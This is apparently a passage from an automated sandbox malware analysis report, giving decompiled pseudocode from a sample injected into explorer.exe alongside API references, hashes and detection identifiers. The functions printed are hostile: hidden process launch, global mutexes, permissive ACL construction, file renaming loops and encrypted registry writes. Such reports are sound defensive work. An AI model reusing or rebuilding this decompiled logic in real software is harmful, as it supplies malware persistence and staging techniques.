				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0xde684; // 0x64f8f0
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					_t30 =  *0xde684; // 0x64f8f0
					 *((intOrPtr*)(_t30 + 0x30))(_v20.hThread);
					_t32 =  *0xde684; // 0x64f8f0
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}











        0x000ca91c
        0x000ca925
        0x000ca92c
        0x000ca934
        0x000ca938
        0x000ca939
        0x000ca93a
        0x000ca93b
        0x000ca93c
        0x000ca941
        0x000ca945
        0x000ca948
        0x000ca948
        0x000ca955
        0x000ca971
        0x000ca9ae
        0x000ca973
        0x000ca976
        0x000ca978
        0x000ca97b
        0x000ca980
        0x000ca988
        0x000ca990
        0x000ca990
        0x000ca988
        0x000ca996
        0x000ca99e
        0x000ca9a1
        0x000ca9a9
        0x000ca9a9
        0x000ca9b6

        APIs
        • memset.MSVCRT ref: 000CA925
        • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,000CC1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 000CA96C
        • GetExitCodeProcess.KERNEL32(00000000,?), ref: 000CA990
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Process$CodeCreateExitmemset
        • String ID:
        • API String ID: 4170947310-0
        • Opcode ID: 515fd2f31e6901e20d6c51561e52fb1df9f2721549949078c0095c01d271d124
        • Instruction ID: ad8e7d9e7c99006ac07fdead5766fa5e04d5cfaaf349d8d5b7d3a67e274f57a9
        • Opcode Fuzzy Hash: 515fd2f31e6901e20d6c51561e52fb1df9f2721549949078c0095c01d271d124
        • Instruction Fuzzy Hash: 4F210E71A10119BFEB519FA9DC85EAE7BBCEB18784B01441AFA15D6161D634DC008B61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CB998, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
        Download Yara Rule
        C-Code - Quality: 86%
        			E000CB998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E000C8604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E000C861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










        0x000cb99b
        0x000cb99c
        0x000cb9a3
        0x000cb9ab
        0x000cb9af
        0x000cb9b8
        0x000cb9fe
        0x000cb9fe
        0x000cb9c5
        0x000cb9cd
        0x000cb9cf
        0x000cb9d5
        0x000cb9ee
        0x00000000
        0x000cb9f0
        0x000cb9f5
        0x00000000
        0x000cb9fb
        0x000cb9d7
        0x000cb9d7
        0x000cb9d7
        0x000cb9d7
        0x000cb9d5
        0x000cba04

        APIs
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9B3
        • GetLastError.KERNEL32(?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9BA
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9E9
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: InformationToken$AllocateErrorHeapLast
        • String ID:
        • API String ID: 2499131667-0
        • Opcode ID: e9155d94487f8a68c3b89b0e28b4ce959b8024583ace24d3e3980001a81adf0b
        • Instruction ID: d997e41f721a916132a1fdbd49b54382bda47c6799cd78954eaa02ec7e04328f
        • Opcode Fuzzy Hash: e9155d94487f8a68c3b89b0e28b4ce959b8024583ace24d3e3980001a81adf0b
        • Instruction Fuzzy Hash: A501A272601118BF9B209BA6DC4AEAF7FECDB457A1B10022AFA05D7111EB30DD0087B0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C590C, Relevance: 4.5, APIs: 3, Instructions: 44synchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000C590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E000CA4BF(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0xde684; // 0x64f8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}








        0x000c5910
        0x000c5915
        0x000c5921
        0x000c592e
        0x000c5932
        0x000c594a
        0x000c596a
        0x000c596b
        0x000c595a
        0x000c595a
        0x000c5960
        0x000c5960
        0x000c5934
        0x000c5934
        0x000c593a
        0x000c593a
        0x000c5917
        0x000c5917
        0x000c5917
        0x000c5973

        APIs
        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5928
        • GetLastError.KERNEL32(?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5934
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateErrorLastMutex
        • String ID:
        • API String ID: 1925916568-0
        • Opcode ID: a8e76bdbdbd469d2b8c3e9a1a01432ac857b6536fe4a497d4adbc72172b7e5b0
        • Instruction ID: d073c145edc5ca2aa73541b9c57a8b093e21ae94b269b6476e6d31558b2c847e
        • Opcode Fuzzy Hash: a8e76bdbdbd469d2b8c3e9a1a01432ac857b6536fe4a497d4adbc72172b7e5b0
        • Instruction Fuzzy Hash: A1F02835601910CBD6A0175ADC84F3E7B98EB95772B51036AF969DB1E1CF34DC4443B1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA471, Relevance: 4.5, APIs: 3, Instructions: 30synchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000CA471(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E000CA4BF(_t17, _t16) < 0) {
						_t8 =  *0xde684; // 0x64f8f0
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}






        0x000ca47d
        0x000ca485
        0x000ca489
        0x000ca4a0
        0x000ca4af
        0x000ca4b5
        0x000ca4b8
        0x000ca4b8
        0x00000000
        0x000ca4ba
        0x000ca48b
        0x00000000

        APIs
        • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,000C4E14,00000000), ref: 000CA47F
        • GetLastError.KERNEL32 ref: 000CA48B
        • GetLastError.KERNEL32 ref: 000CA495
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: ErrorLast$CreateMutex
        • String ID:
        • API String ID: 200418032-0
        • Opcode ID: 77e21d80ee078d91a8c29d57bde9561238bcfa181556416213a9dbb61c26a2d7
        • Instruction ID: aa0b7b2252ede9d51be57bd9111e8f042ae3321c19d90ec579b42b1c7a2d6374
        • Opcode Fuzzy Hash: 77e21d80ee078d91a8c29d57bde9561238bcfa181556416213a9dbb61c26a2d7
        • Instruction Fuzzy Hash: 49F0ED313014249BE6252729E88CF5F3B99DFE9754F02446AFA09CB251EAACCC0643F2
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C6DA0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
        Download Yara Rule
        C-Code - Quality: 91%
        			E000C6DA0(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0xde778; // 0x64fc18
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E000C9ED0(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0xde78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0xde688; // 0xf0000
						_t10 = E000CEDCF(_t49 + 0xb0, _t51, _t66);
						 *0xde78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0xde688; // 0xf0000
					_push(L"\\c");
					_t9 = E000C92E5(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0xde688; // 0xf0000
							_t56 = E000CA471(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E000CB269(_t59) == 0) {
								_t32 = E000CF14F(_t59, 0x1388, _t74);
							}
							E000CA4DB(_t56);
							_t41 =  *0xde684; // 0x64f8f0
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E000C980C( &_v544);
								_t43 =  *0xde778; // 0x64fc18
								_t53 = 0x33;
								if(E000C9ED0(_t43, _t53) != 0) {
									L12:
									__eflags = E000C1C68(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E000CB1B1(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0xde778; // 0x64fc18
									_t53 = 0x12;
									_t22 = E000C9ED0(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E000CA4EF(_t53, _t72) != 0) {
										_push(E000C980C(0));
										E000C9640( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E000C861A( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}
























        0x000c6da0
        0x000c6da6
        0x000c6dac
        0x000c6db9
        0x000c6dba
        0x000c6dbb
        0x000c6dc2
        0x000c6dc8
        0x000c6dcd
        0x000c6dcf
        0x000c6dd1
        0x000c6ddd
        0x000c6de2
        0x000c6de2
        0x000c6de7
        0x000c6de9
        0x000c6dea
        0x000c6df4
        0x000c6dfa
        0x000c6dff
        0x000c6e01
        0x000c6e04
        0x000c6e0a
        0x000c6e10
        0x000c6e10
        0x000c6e26
        0x000c6e2a
        0x00000000
        0x00000000
        0x000c6e39
        0x000c6e42
        0x000c6e42
        0x000c6e46
        0x000c6e4b
        0x000c6e52
        0x000c6e57
        0x000c6e5d
        0x000c6e62
        0x000c6e6a
        0x000c6e72
        0x000c6ec0
        0x000c6ec7
        0x000c6ec9
        0x000c6ecd
        0x00000000
        0x000c6ecd
        0x000c6e74
        0x000c6e74
        0x000c6e7c
        0x000c6e7d
        0x000c6e82
        0x000c6e84
        0x000c6e96
        0x000c6ea7
        0x000c6eac
        0x000c6eb5
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x000c6e84
        0x000c6e72
        0x00000000
        0x000c6e57
        0x000c6ede
        0x000c6ee4
        0x000c6e0a
        0x000c6eeb

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: FileMove
        • String ID: %s.%u
        • API String ID: 3562171763-1288070821
        • Opcode ID: abb1974d68a3cf11a90f5f4fc4a910d84dcf3eeb1d4c396366a110d1392bc96d
        • Instruction ID: 16c242f961a16b44c7ea8ae58b162dabe7e8efe05d509a60da4a7651e3b0c8da
        • Opcode Fuzzy Hash: abb1974d68a3cf11a90f5f4fc4a910d84dcf3eeb1d4c396366a110d1392bc96d
        • Instruction Fuzzy Hash: 07318B753053509AE664FB65DC8AFAE339ADB90754F14002EFA058B2C3EF2AD905C762
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C2AEA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71stringCOMMON
        Download Yara Rule
        C-Code - Quality: 89%
        			E000C2AEA() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0xde710 * 0x64;
				_t39 = 0;
				_v12 =  *0xde710 * 0x64;
				_t16 = E000C8604(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0xde710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E000C9F48(0xe); // executed
						E000C861A( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0xde714; // 0x64fe88
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0xde714; // 0x64fe88
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E000C9601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0xde710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}
















        0x000c2af0
        0x000c2afa
        0x000c2afd
        0x000c2b00
        0x000c2b05
        0x000c2b07
        0x000c2b0d
        0x000c2b17
        0x000c2b1d
        0x000c2b1f
        0x000c2b24
        0x000c2b81
        0x000c2b87
        0x000c2b8b
        0x000c2b96
        0x00000000
        0x000c2b9d
        0x000c2b26
        0x000c2b28
        0x000c2b28
        0x000c2b31
        0x000c2b35
        0x000c2b3d
        0x000c2b43
        0x000c2b43
        0x000c2b44
        0x000c2b49
        0x000c2b4d
        0x000c2b63
        0x000c2b68
        0x000c2b6e
        0x000c2b71
        0x000c2b74
        0x000c2b74
        0x000c2b76
        0x000c2b77
        0x000c2b7a
        0x000c2b7d
        0x00000000
        0x000c2b28
        0x00000000

        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • lstrcatA.KERNEL32(00000000,000DB9A0,000C573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,000C573E), ref: 000C2B3D
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeaplstrcat
        • String ID: %u;%u;%u
        • API String ID: 3011335133-2973439046
        • Opcode ID: 2094acf824114d6b149425799c8295bbb7a354877be0ea23f216adc157b61f9a
        • Instruction ID: c18da029e8387f57c48651e8e1138d8feb965970a6bd18960df813de622e7610
        • Opcode Fuzzy Hash: 2094acf824114d6b149425799c8295bbb7a354877be0ea23f216adc157b61f9a
        • Instruction Fuzzy Hash: A4110632A01304ABDB14EFA9DCC5E9E7BB9EB84324B10446EE900DB191CB349D00CB64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CBD10, Relevance: 3.1, APIs: 2, Instructions: 149memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 59%
        			E000CBD10() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0xde68c; // 0x64fab8
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0xde68c; // 0x64fab8
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0xde68c; // 0x64fab8
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0xde684; // 0x64f8f0
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0xde684; // 0x64f8f0
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0xde688; // 0xf0000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0xde68c; // 0x64fab8
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0xde68c; // 0x64fab8
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0xde68c; // 0x64fab8
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0xde68c; // 0x64fab8
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0xde68c; // 0x64fab8
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0xde68c; // 0x64fab8
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}






































        0x000cbd1b
        0x000cbd1e
        0x000cbd26
        0x000cbd2c
        0x000cbd2f
        0x000cbd34
        0x000cbd3a
        0x000cbd3b
        0x000cbd3c
        0x000cbd3d
        0x000cbd3e
        0x000cbd3f
        0x000cbd40
        0x000cbd41
        0x000cbd44
        0x000cbd47
        0x000cbd49
        0x000cbd4c
        0x000cbd50
        0x000cbd53
        0x000cbd54
        0x000cbd59
        0x000cbd60
        0x000cbe54
        0x000cbe58
        0x000cbe5a
        0x000cbe62
        0x000cbe62
        0x000cbe69
        0x000cbe6b
        0x000cbe73
        0x000cbe73
        0x000cbe78
        0x000cbe7a
        0x000cbe80
        0x000cbe80
        0x000cbe87
        0x000cbe89
        0x000cbe91
        0x000cbe91
        0x000cbe95
        0x000cbe9a
        0x000cbe9a
        0x000cbd6b
        0x000cbd6e
        0x000cbd75
        0x000cbd76
        0x000cbd7d
        0x000cbd80
        0x000cbd87
        0x000cbd8a
        0x000cbd95
        0x000cbda0
        0x00000000
        0x00000000
        0x00000000
        0x000cbda2
        0x000cbda2
        0x000cbda5
        0x000cbda6
        0x000cbda7
        0x000cbda8
        0x000cbda9
        0x000cbdaa
        0x000cbdab
        0x000cbdac
        0x000cbdae
        0x000cbdaf
        0x000cbdb3
        0x000cbdb4
        0x000cbdbe
        0x00000000
        0x000cbdc4
        0x000cbdc4
        0x000cbdc9
        0x000cbdcb
        0x000cbdcd
        0x000cbdce
        0x000cbdd5
        0x000cbdd8
        0x000cbddf
        0x000cbde2
        0x000cbde5
        0x000cbde5
        0x000cbde8
        0x000cbdeb
        0x000cbdec
        0x000cbdf0
        0x000cbdf1
        0x000cbdf6
        0x000cbdfc
        0x00000000
        0x00000000
        0x000cbe08
        0x000cbe0c
        0x00000000
        0x00000000
        0x000cbe0e
        0x000cbe14
        0x000cbe16
        0x000cbe1f
        0x00000000
        0x00000000
        0x000cbe21
        0x000cbe26
        0x000cbe27
        0x000cbe2a
        0x000cbe2c
        0x000cbe35
        0x00000000
        0x00000000
        0x000cbe3a
        0x000cbe3c
        0x000cbe44
        0x000cbe44
        0x000cbe47
        0x000cbe4f
        0x00000000
        0x000cbe4f
        0x000cbdbe

        APIs
        • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 000CBDF7
        • LocalAlloc.KERNEL32(00000040,00000014), ref: 000CBE02
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocEntriesLocal
        • String ID:
        • API String ID: 2146116654-0
        • Opcode ID: 1d99a57611baaec703b87adae8a6e6c7168fee3c9c6b929967c5ce84b8f1f07f
        • Instruction ID: fb9cf3d49498b04ba18fc6af388e3f93cc6b6c7a00e5ba42f1d92bd048f5cdbb
        • Opcode Fuzzy Hash: 1d99a57611baaec703b87adae8a6e6c7168fee3c9c6b929967c5ce84b8f1f07f
        • Instruction Fuzzy Hash: C5512B71901248EFDB20DF99D889FDDBBF8EF44700F15806AF605AB2A0D7748944CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA0AB, Relevance: 3.1, APIs: 2, Instructions: 146registryCOMMON
        Download Yara Rule
        C-Code - Quality: 82%
        			E000CA0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
				intOrPtr _t84;
				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E000CD400( &_v12, _t103);
					_t93 = _t107 + __edx;
					E000D2301(_t107 + __edx,  &_v2832);
					_t54 = E000D242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E000C8604(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E000C86E1(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E000D22D3( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E000CF490( &_v16, _t104);
						E000CEAC1( &_v16,  &_v52, 0x14,  &_v328);
						E000CEB2E(_t106, _v20,  &_v328);
						_t73 = E000C9B0E(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E000C97A0(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								_t84 =  *0xde68c; // 0x64fab8
								 *((intOrPtr*)(_t84 + 0x1c))(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E000C861A( &_v12, 0xffffffff);
						}
						E000C861A( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}




























        0x000ca0b8
        0x000ca0bd
        0x000ca0bf
        0x000ca0c2
        0x000ca231
        0x000ca231
        0x000ca231
        0x00000000
        0x000ca0d2
        0x000ca0d2
        0x000ca0d4
        0x00000000
        0x00000000
        0x000ca0da
        0x000ca0e3
        0x000ca0e6
        0x000ca0e7
        0x000ca0ef
        0x000ca0f2
        0x000ca0fd
        0x000ca10d
        0x000ca112
        0x000ca115
        0x000ca11e
        0x000ca126
        0x000ca12b
        0x000ca130
        0x000ca13d
        0x000ca13f
        0x000ca146
        0x000ca14b
        0x000ca14e
        0x000ca156
        0x000ca163
        0x000ca168
        0x000ca16e
        0x000ca177
        0x000ca17d
        0x000ca180
        0x000ca181
        0x000ca193
        0x000ca1a3
        0x000ca1af
        0x000ca1b4
        0x000ca1b7
        0x000ca1b9
        0x000ca1c3
        0x000ca1de
        0x000ca1e1
        0x000ca1e3
        0x000ca1fe
        0x000ca201
        0x000ca203
        0x000ca205
        0x000ca207
        0x000ca207
        0x000ca208
        0x000ca210
        0x000ca1e5
        0x000ca1e5
        0x000ca1e7
        0x000ca1e7
        0x000ca219
        0x000ca21f
        0x000ca226
        0x00000000
        0x000ca22d
        0x000ca134
        0x00000000
        0x000ca134

        APIs
          • Part of subcall function 000D242D: _ftol2_sse.MSVCRT ref: 000D248E
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 000CA1DE
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeapOpen_ftol2_sse
        • String ID:
        • API String ID: 3756893521-0
        • Opcode ID: 16be1238e50dcd6ccbf2a17972ac82d6104939afd61b824ff034df4e1ce5065a
        • Instruction ID: 9aabb578f3ec898990dbc52fcad180c0f02837a836db019fe8de1ec4e559170f
        • Opcode Fuzzy Hash: 16be1238e50dcd6ccbf2a17972ac82d6104939afd61b824ff034df4e1ce5065a
